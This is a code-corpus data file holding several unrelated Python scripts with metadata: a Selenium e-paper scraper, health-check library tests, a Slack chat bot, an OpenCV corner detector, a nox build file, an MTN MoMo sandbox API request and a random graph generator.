    of name and get its value\npaperLink = soup.find('a', text=\"Epaper\")\nepaperLink = paperLink.get('href')\n\nreq = urllib2.Request(epaperLink, headers=hdr)\npage = urllib2.urlopen(req)\n\n# parse the html using beautiful soup and store in variable `soup`\nsoup = BeautifulSoup(page, \"html.parser\")\n\nstateNameList = []\nsuperCityState = [[]]\ncitiesFromSupercity = {}\npaperLink = soup.find('ul', id=\"navbar\").find_all(recursive=False)\nfor name in paperLink:\n findStateName = name.find('a', href=\"#\")\n if findStateName is not None:\n stateName = findStateName.text.strip(\";\")\n stateNameList.append(stateName)\n\n\n\n#capa = DesiredCapabilities.CHROME\n#capa[\"pageLoadStrategy\"] = \"none\"\ndriver = webdriver.Chrome()\nwait = WebDriverWait(driver, 10)\ndriver.get(\"http://epaper.jagran.com/homepage.aspx\")\ndataEpaper = {}\ndataEpaper['state'] = []\nfor stateVar in stateNameList:\n # select first state\n print(\"+++++++++++++++++++++++++\")\n print(stateVar)\n print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n #if (stateVar==\"Delhi\") | (stateVar==\"UP\") | (stateVar==\"Haryana\") | (stateVar==\"Uttarakhand\") | (stateVar==\"Bihar\") :\n #continue\n epaperLinkList = []\n dataEpaper['state'].append({\n 'name':stateVar,\n 'city':epaperLinkList\n })\n stateWebElement = driver.find_element_by_xpath('//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' %stateVar)\n hoverOverOnState = ActionChains(driver).move_to_element(stateWebElement).perform()\n superCityWebElement = stateWebElement.find_elements_by_xpath('./..//section/ul/li/a[@href=\"#\" or text()=\"%s\"]' %stateVar)\n\n print(len(superCityWebElement))\n superCityList = []\n for superCityWeb in superCityWebElement:\n print(superCityWeb)\n superCityList.append(superCityWeb.text)\n print(superCityWeb.text)\n print(\"-----------\")\n for superCity in superCityList:\n #if (superCity == \"Dhanbad\") | (superCity == \"Jamshedpur\") : #| (superCity == \"Allahabad\") | (superCity == \"Bareilly\") | (superCity == \"Gorakhpur\") | (superCity == \"Kanpur\") | (superCity == \"Jhansi\") :\n #continue\n stateWebElementFirst = driver.find_element_by_xpath(\n '//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' % stateVar)\n superCityWebElementFirst = stateWebElementFirst.find_element_by_xpath(\n './..//section/ul/li/a[text()=\"%s\"]' %superCity)\n hoverOverOnStateFirst = ActionChains(driver).move_to_element(stateWebElementFirst)\n hoverOverOnSuperCityFirst = hoverOverOnStateFirst.move_to_element(superCityWebElementFirst)\n hoverOverOnSuperCityFirst.perform()\n\n superCityName = superCity\n print(\"#################\")\n print(superCity)\n print(\"#################\")\n citiWebElement = superCityWebElementFirst.find_elements_by_xpath('./../ul//li')\n cityList = []\n for cityWeb in citiWebElement:\n cityList.append(cityWeb.text)\n print(cityWeb.text)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n for city in cityList:\n cityObject = {}\n cityCode = \"\"\n staleElement = True\n while (staleElement):\n try:\n wait.until(EC.visibility_of_element_located((By.ID, 'navbar')))\n #driver.execute_script(\"window.stop();\")\n stateWebElementAgain = driver.find_element_by_xpath(\n '//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' % stateVar)\n superCityWebElementAgain = stateWebElementAgain.find_element_by_xpath(\n './..//section/ul/li/a[text()=\"%s\"]' % superCityName)\n hoverOverOnStateAgain = ActionChains(driver).move_to_element(stateWebElementAgain)\n hoverOverOnSuperCityAgain = hoverOverOnStateAgain.move_to_element(superCityWebElementAgain)\n 
hoverOverOnSuperCityAgain.perform()\n #cityName = city.text\n print(\"#################\")\n print(city)\n print(\"#################\")\n cityXPath = superCityWebElementAgain.find_element_by_xpath(\n './..//li/a[text()=\"%s\"]' % city)\n #myxpath = ('//li/a[text()=\"%s\"]' % city)\n #element = wait.until(\n #EC.element_to_be_clickable((By.XPATH, cityXPath)))\n #time.sleep(1)\n cityXPath.click()\n #time.sleep(1)\n wait.until(EC.visibility_of_element_located((By.ID, 'navbar')))\n print(\"&&&&&&&&&&&&&&&&&&&&&&found &&&&&&&&&&&&&&&&&&&&&&&&&&&\")\n driver.execute_script(\"window.stop();\")\n elementPdfLink = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//a[@href=\"#\" and @class=\"pdf\"]')))\n driver.find_element_by_xpath('//a[@href=\"#\" and @class=\"pdf\"]').send_keys(Keys.ESCAPE)#findElement((By.XPATH, '//a[@href=\"#\" and @class=\"pdf\"]')).sendKeys(\"Keys.ESCAPE\");\n elementPdfLink.click()\n #time.sleep(1)\n windowTab = driver.window_handles\n for tab in windowTab:\n if tab != windowTab[0]:\n driver.switch_to.window(tab)\n codeUrl = driver.current_url\n print(codeUrl)\n matchObj = re.match(r'http://epaper.jagran.com/epaperimages/\\d+/.+/\\d\\d(.+)-pg.+', codeUrl, re.M | re.I)\n cityCode = matchObj.group(1)\n driver.close()\n cityObject[city] = cityCode\n epaperLinkList.append(cityObject)\n driver.switch_to.window(windowTab[0])\n print(\"coming till here\")\n json_data = json.dumps(dataEpaper)\n print(json_data)\n staleElement = False\n except Exception as e:\n print(\"it is stale\")\n print(e)\n cityObject[city] = \"NOT Found\"\n for window in driver.window_handles:\n driver.switch_to.window(window)\n try:\n driver.switch_to.alert.accept()\n except NoAlertPresentException:\n pass\n windowTab = driver.window_handles\n for tab in windowTab:\n if tab != windowTab[0]:\n driver.switch_to.window(tab)\n codeUrl = driver.current_url\n print(codeUrl)\n driver.close()\n driver.switch_to.window(windowTab[0])\n traceback.print_exc()\n staleElement = False\n\n\n\nassert \"No results found.\" not in driver.page_source\ndriver.close()\n\njson_data = json.dumps(dataEpaper)\nprint(json_data)\n\n\n", "sub_path": "scrapy.py", "file_name": "scrapy.py", "file_ext": "py", "file_size_in_byte": 8314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.Request", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 57, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 74, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 91, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 112, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 112, "usage_type": "name"}, {"api_name": 
"selenium.webdriver.common.by.By.ID", "line_number": 112, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 112, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 118, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 133, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 133, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 133, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 137, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 137, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 137, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 137, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ESCAPE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 138, "usage_type": "name"}, {"api_name": "re.match", "line_number": 147, "usage_type": "call"}, {"api_name": "re.M", "line_number": 147, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 147, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoAlertPresentException", "line_number": 165, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 175, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "234185324", "text": "import logging\nfrom datetime import datetime, timedelta\nfrom time import mktime\n\nimport pytest\n\nfrom healthysnake import exceptions, levels\nfrom healthysnake.healthcheck import HealthCheck\n\n\ndef success_check():\n return True\n\n\ndef fail_check():\n return False\n\n\ndef exception_check():\n raise Exception('bang')\n\n\nclass TestHealthCheck(object):\n def test_init(self):\n logger = logging.getLogger(__name__)\n hc = HealthCheck('app', logger=logger)\n assert hc.name == 'app'\n assert hc._logger is not None\n\n def test_add_dependency(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency', success_check, interval=timedelta(seconds=60), level=levels.SOFT)\n assert hc._services['dependency'] is not None\n assert hc._services['dependency']._interval == timedelta(seconds=60)\n assert hc._services['dependency'].level == levels.SOFT\n\n with pytest.raises(exceptions.DependencyAlreadyPresentException):\n hc.add_dependency('dependency', success_check, interval=timedelta(seconds=60), level=levels.SOFT)\n\n def test_check_dependency(self):\n hc = HealthCheck('app')\n with pytest.raises(exceptions.DependencyNotPresentException):\n hc.check_dependency('dependency')\n hc.add_dependency('dependency', success_check)\n assert hc.check_dependency('dependency') == (True, '')\n\n def test_status_success(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n status = hc.status()\n assert status['name'] == 'app'\n assert status['healthy'] is True\n dep = status['dependencies'][0]\n assert dep['name'] == 'dependency1'\n assert dep['healthy'] is True\n assert dep['level'] is 
levels.HARD\n last_updated = dep['last_updated']\n assert last_updated <= mktime(datetime.utcnow().timetuple())\n assert dep['next_update'] == last_updated + 10\n\n def test_status_success_soft_failing(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', fail_check, level=levels.SOFT)\n status = hc.status()\n assert status['healthy'] is True\n soft_dep = next(dep for dep in status['dependencies'] if dep['level'] == levels.SOFT)\n assert soft_dep['healthy'] is False\n\n def test_status_unhealthy_hard_failing(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', fail_check)\n status = hc.status()\n assert status['healthy'] is False\n\n def test_status_raise_exception_counts_as_fail(self):\n logging.disable(logging.CRITICAL)\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', exception_check)\n hc._services['dependency2'].last_updated = hc._services['dependency2'].last_updated - timedelta(seconds=60)\n status = hc.status()\n assert status['healthy'] is False\n", "sub_path": "healthysnake/tests/test_healthcheck.py", "file_name": "test_healthcheck.py", "file_ext": "py", "file_size_in_byte": 3074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 26, "usage_type": "call"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 32, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 34, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 35, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 37, "usage_type": "call"}, {"api_name": "healthysnake.exceptions.DependencyAlreadyPresentException", "line_number": 37, "usage_type": "attribute"}, {"api_name": "healthysnake.exceptions", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 38, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 38, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 38, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 42, "usage_type": "call"}, {"api_name": "healthysnake.exceptions.DependencyNotPresentException", "line_number": 42, "usage_type": "attribute"}, {"api_name": "healthysnake.exceptions", "line_number": 42, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 48, "usage_type": "call"}, {"api_name": "healthysnake.levels.HARD", "line_number": 56, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 56, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": 
"healthysnake.healthcheck.HealthCheck", "line_number": 62, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 64, "usage_type": "name"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 67, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 71, "usage_type": "call"}, {"api_name": "logging.disable", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "151617003", "text": "import json\nimport random\nimport re\nimport requests\nfrom sys import stderr\nfrom itertools import islice\n\nimport praw\nfrom credentials import *\nfrom datetime import datetime, timedelta\nfrom flask import Flask, request, make_response, render_template\nfrom slackclient import SlackClient\n\nsc = SlackClient(oauth_token_bot)\nuser = SlackClient(oauth_token_user)\nreddit = praw.Reddit(client_id=reddit_client_id, \n client_secret=reddit_client_secret,\n user_agent='Slackchop')\n\n# this is an infinite random bit generator. shitty but it works\nrandbits = iter(lambda: random.getrandbits(1), 2)\ndef randstream(i):\n return iter(lambda: random.randrange(i), i)\n\ndef p(*args, **kwargs):\n print(*args, **kwargs, file = stderr)\n\nyoutube_url = 'https://www.youtube.com'\nyoutube_vid_regex = '/watch\\?v=[^\"]+'\ngoogle_search_base = 'https://www.google.com/search'\nfake_mobile_agent = '''Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Versio n/4.0.5 Mobile/8A293 Safari/6531.22.7'''\nshake = {'?': 'question',\n '.': 'period',\n '~': 'tilde',\n '+': 'plus',\n '-': 'minus',\n '/': 'slash',\n '=': 'equals',\n ',': 'comma',\n '!': 'exclamation',\n '#': 'octothorpe',\n '$': 'dollar',\n '*': 'asterisk'}\n\n\n\napplication = Flask(__name__)\n\ndef get_emojis(init=False, add=None, rmeove=None):\n # currently can't get this from an online list because slack doesn't return\n # a list of default emoji they support and provide no way of checking if\n # they support a particular emoji either\n emojis = open('emoji_names.txt').read().splitlines()\n # add all current emojis\n emojis += list(user.api_call('emoji.list')['emoji'].keys())\n return emojis\n\nemojis = get_emojis()\n\ndef truncate_message(message):\n message = message[:4000]\n if message.endswith('::'):\n message = message[:-1]\n elif not message.endswith(':'):\n message = message.rsplit(':', 1)[0]\n return message\n\ndef send_message(*args, **kwargs):\n sc.api_call('chat.postMessage', *args, **kwargs)\n\ndef handle_message(slack_event, message):\n channel = slack_event['event']['channel']\n match = re.match(r'!youtube\\s+(.+)', message)\n if match:\n res = requests.get(youtube_url + '/results',\n params={'search_query':match[1]})\n vids = re.findall(youtube_vid_regex, res.text)\n send_message(channel=channel, text=youtube_url+vids[0])\n return\n\n match = re.match(r'!(gif|image)\\s+(.+)', message)\n if match:\n t, q = match[1], match[2]\n #TODO: Normalize messages before passing them to modules\n q = re.sub(r'<[^\\|]*\\|([^>]+)>', r'\\1', q)\n params = {'tbm':'isch', 'q':q, 'safe':''}\n if t == 'gif': params['tbs'] = 'itp:animated'\n 
response = requests.get(google_search_base,\n params=params, headers={\"User-agent\": fake_mobile_agent})\n links = re.findall(r'imgurl\\\\x3d([^\\\\]+)\\\\', response.text)\n send_message(channel=channel, text=random.choice(links),\n unfurl_links=True, unfurl_media=True)\n\n match = re.match(r'!roll\\s+(\\d*|an?)\\s*[dD]\\s*(\\d+)', message)\n if match:\n n, d = match[1], match[2]\n n = 1 if 'a' in n else int(n)\n d = int(d)\n reply = ', '.join([str(random.randrange(d)+1) for i in range(n)])\n send_message(channel=channel, text=reply);\n return\n if message.rstrip() == '!flip':\n reply = 'heads' if random.getrandbits(1) else 'tails'\n send_message(channel=channel, text=reply);\n return\n match = re.match(r'!(?:shuffle|flip)\\s+(.+)', message)\n if match:\n items = list(map(lambda x:x.strip(), match[1].split(',')))\n random.shuffle(items)\n reply = ', '.join(items)\n send_message(channel=channel, text=reply);\n return\n\n match = re.match(r'!emoji\\s+(\\d+)\\s*', message)\n if match:\n num = int(match[1])\n if num == 0: return\n reply = ':{}:'.format('::'.join(random.choices(emojis, k=num)))\n send_message(channel=channel, text=truncate_message(reply))\n return\n match = re.match(r'!emoji\\s+(:[^:]+:)(?:[\\*xX\\s])?(\\d+)', message)\n if match and int(match[2]) > 0 and match[1][1:-1] in emojis:\n send_message(channel=channel, text=truncate_message(match[1]*int(match[2])))\n return\n match = re.match(r'!emoji\\s+(\\S+)\\s*', message)\n if match:\n es = [x for x in emojis if re.search(match[1], x)]\n if len(es) == 0: return\n reply = ':{}:'.format('::'.join(es))\n send_message(channel=channel, text=truncate_message(reply))\n return\n\n match = re.match(r'!shake\\s+(\\S.*)', message)\n if match:\n pattern = 'shake_{}'\n words = []\n for word in match[1].split():\n parts = []\n for letter in word.lower():\n if letter.isalnum():\n parts.append(pattern.format(letter))\n elif letter in shake:\n parts.append(pattern.format(shake[letter]))\n words.append(':' + '::'.join(parts) + ':')\n reply = ':space:'.join(words)\n send_message(channel=channel, text=truncate_message(reply))\n return\n\n if message.startswith('!emojify'):\n words = message.split(' ')[1:]\n pattern = ':{}:'\n if words[0].startswith('`') and words[0].endswith('`'):\n pattern = words[0][1:-1]\n words = words[1:]\n if len(words) == 1:\n words = words[0]\n ems = list(map(lambda x: pattern.format(x), words))\n send_message(channel=channel, text=''.join(ems))\n return\n\n take = lambda x: not x.stickied and not x.is_self\n match = re.match(r'!randfeld\\s+(.*)', message)\n if match:\n sub = choose(filter(take,\n reddit.subreddit('seinfeldgifs').search(match[1]+' self:no')), 50)\n send_message(channel=channel, text=sub.url,\n unfurl_links=True, unfurl_media=True, icon_emoji=':jerry:')\n return\n if message.startswith('!randfeld'):\n sub = choose(filter(take,\n reddit.subreddit('seinfeldgifs').hot(limit=50)))\n send_message(channel=channel, text=sub.url,\n unfurl_links=True, unfurl_media=True, icon_emoji=':jerry:')\n return\n\n if message.startswith('!gridtext '):\n text = message.split(' ', 1)[1]\n if len(text) > 80: text = text[:80]\n res = []\n n = len(text)\n for i in range(n):\n res.append(' '.join(text))\n text = text[-1] + text[:-1]\n reply = '```{}```'.format('\\n'.join(res))\n send_message(channel=channel, text=reply)\n return\n\ndef choose(seq, limit=None):\n if limit: seq = islice(seq, limit)\n ret = None\n for item, take in zip(seq, randstream(5)):\n if not ret: ret = item\n if not take: return item\n return ret\n\ndef 
event_handler(slack_event):\n event = slack_event['event']\n event_type = event['type']\n if event_type == 'reaction_added':\n user_id = event['user']\n elif event_type == 'message' and 'text' in event:\n handle_message(slack_event, event['text'])\n elif event_type == 'emoji_changed':\n global emojis\n if event['subtype'] == 'add':\n emojis.append(event['name'])\n elif event['subtype'] == 'remove':\n for name in event['names']:\n emojis.remove(name)\n else:\n p(slack_event)\n return make_response(\"Ok\", 200, )\n\n@application.route(\"/events\", methods=[\"GET\", \"POST\"])\ndef hears():\n slack_event = json.loads(request.data)\n p(slack_event)\n if \"challenge\" in slack_event:\n return make_response(slack_event[\"challenge\"],\n 200, {\"content_type\": \"application/json\"})\n return event_handler(slack_event)\n\n@application.route(\"/begin_auth\", methods=[\"GET\"])\ndef pre_install():\n return '''\n <a href=\"https://slack.com/oauth/authorize?scope={0}&client_id={1}\">\n Add to Slack\n </a>\n '''.format(oauth_scope, client_id)\n\n@application.route(\"/finish_auth\", methods=[\"GET\", \"POST\"])\ndef post_install():\n auth_code = request.args['code']\n sc = SlackClient(\"\")\n auth_response = sc.api_call(\n \"oauth.access\",\n client_id=client_id,\n client_secret=client_secret,\n code=auth_code\n )\n user_token = auth_response['access_token']\n bot_token = auth_response['bot']['bot_access_token']\n return \"Auth complete\"\n\n@application.route(\"/\")\ndef go_away():\n return 'Go Away'\n\nif __name__ == '__main__':\n application.run(debug=True)\n", "sub_path": "application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 8626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "slackclient.SlackClient", "line_number": 14, "usage_type": "call"}, {"api_name": "slackclient.SlackClient", "line_number": 15, "usage_type": "call"}, {"api_name": "praw.Reddit", "line_number": 16, "usage_type": "call"}, {"api_name": "random.getrandbits", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 47, "usage_type": "call"}, {"api_name": "re.match", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 75, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 77, "usage_type": "call"}, {"api_name": "re.match", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 85, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 88, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 90, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 91, "usage_type": "call"}, {"api_name": "re.match", "line_number": 94, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 99, "usage_type": "call"}, {"api_name": "random.getrandbits", "line_number": 103, "usage_type": "call"}, {"api_name": "re.match", "line_number": 106, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 109, "usage_type": "call"}, {"api_name": "re.match", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 118, "usage_type": "call"}, {"api_name": "re.match", "line_number": 121, "usage_type": "call"}, {"api_name": "re.match", "line_number": 125, "usage_type": "call"}, {"api_name": "re.search", "line_number": 127, "usage_type": "call"}, {"api_name": "re.match", "line_number": 133, 
"usage_type": "call"}, {"api_name": "re.match", "line_number": 162, "usage_type": "call"}, {"api_name": "itertools.islice", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 212, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "flask.request.data", "line_number": 216, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "slackclient.SlackClient", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "538127437", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimg = cv2.imread('img_07473.jpg')\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n#gray = np.float32(gray)\n\ncorners = cv2.goodFeaturesToTrack(gray,25,0.01,10)\ncorners = np.int0(corners)\n\nfor i in corners:\n x,y = i.ravel()\n cv2.circle(img,(x,y),3,255,-1)\n\nplt.imshow(img)\nplt.savefig(\"corners.png\")\n", "sub_path": "scripts/corners/corners.py", "file_name": "corners.py", "file_ext": "py", "file_size_in_byte": 364, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "224931623", "text": "# Standard Library\nimport platform\n\nfrom pathlib import Path\n\n# Third Party Library\nimport nox\nimport nox.sessions\n\n# First Party Library\nfrom build import build_lark_parser\n\n\nnox.options.stop_on_first_error = True\n\ncurrent_python_version = \"%s.%s\" % platform.python_version_tuple()[:2]\n\n\npythons = [\"3.7\", \"3.8\"]\nassert current_python_version in pythons\npythons = [current_python_version]\n\nlark_parser_path = Path(\"jsonpath/lark_parser\")\n\n\n@nox.session(python=pythons, reuse_venv=True)\n@nox.parametrize(\n \"parser_backend\", [\"standalone\", \"lark-parser\"],\n)\ndef test(session: nox.sessions.Session, parser_backend):\n session.run(\n \"poetry\",\n \"install\",\n \"-v\",\n \"-E\",\n \"test\",\n *(\n (\"-E\", parser_backend)\n if parser_backend == \"lark-parser\"\n else tuple()\n ),\n \"--no-dev\",\n external=True,\n )\n if \"standalone\":\n if not lark_parser_path.exists():\n build_lark_parser()\n else:\n if lark_parser_path.exists():\n lark_parser_path.unlink()\n\n session.run(\"pytest\", \"-vv\", \"--cov=jsonpath\", \"--cov-append\")\n\n\n@nox.session\ndef build(session):\n session.run(\"poetry\", \"install\", \"-v\", \"--no-dev\", external=True)\n if not lark_parser_path.exists():\n build_lark_parser()\n session.run(\"poetry\", \"build\")\n", "sub_path": "noxfile.py", 
"file_name": "noxfile.py", "file_ext": "py", "file_size_in_byte": 1348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nox.options", "line_number": 14, "usage_type": "attribute"}, {"api_name": "platform.python_version_tuple", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "call"}, {"api_name": "nox.sessions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "build.build_lark_parser", "line_number": 47, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 26, "usage_type": "call"}, {"api_name": "nox.parametrize", "line_number": 27, "usage_type": "call"}, {"api_name": "build.build_lark_parser", "line_number": 59, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 55, "usage_type": "attribute"}]} +{"seq_id": "410376895", "text": "import httplib, urllib, base64, uuid,json\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': 'f262afa7a68a4acfac4f60a93cf0b017'\n}\nparams = urllib.urlencode({\n})\nbody = json.dumps({\n \"providerCallbackHost\": \"https://github.com/oswald-pro/I-m-paying-my-tuition/blob/master/v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey/apikey.py\" })\ntry:\n conn = httplib.HTTPSConnection('sandbox.momodeveloper.mtn.com')\n conn.request(\"POST\", \"/v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey?%s\" % params, body, headers)\n response = conn.getresponse()\n print(response.status)\n print(response.reason)\n data = response.read()\n print(data)\n conn.close()\nexcept Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))", "sub_path": "v1_0/apiuser/1dca2309-a740-4141-b48b-b25bd2b74a61/apikey/apikey.py", "file_name": "apikey.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib.urlencode", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "httplib.HTTPSConnection", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "53387603", "text": "import networkx\nimport numpy\nimport random\ndir_to_folder_of_graphs = \"/home/avi_kadria/Desktop/Shortest_cycles/directed_weighted_graphs\"\nindex = 1\n\n\ndef create_graph(num_vertices, p, min_weight, max_weight):\n global index\n graph = networkx.Graph()\n for i in range(num_vertices):\n graph.add_node(i)\n for i in range(num_vertices):\n for j in range(num_vertices):\n if random.random() < p:\n # in probability p adds an edge :\n w = random.randint(min_weight, max_weight)\n graph.add_edge(i, j, weight=w)\n new_dir = dir_to_folder_of_graphs + \"/\" + \"directed_weighted_nodes_\" + str(num_vertices) + \"_edges_\" \\\n + str(graph.number_of_edges()) + \"_min_weight_\" + str(min_weight) + \"_max_weight_\" + str(max_weight)\\\n + \"_index_\" + str(index)\n # networkx.write_gml(graph, new_dir)\n index += 1\n return graph\n\n\n\n\n\n#\n# for num_vertices in range(100, 1001, 100): # 10\n# for power in numpy.arange(0.7, 1.3, 0.001): # 6000\n# p = (num_vertices**power)/(num_vertices * (num_vertices-1))\n# for min_weight in range(0, 1001, 200): # 5\n# for max_weight in 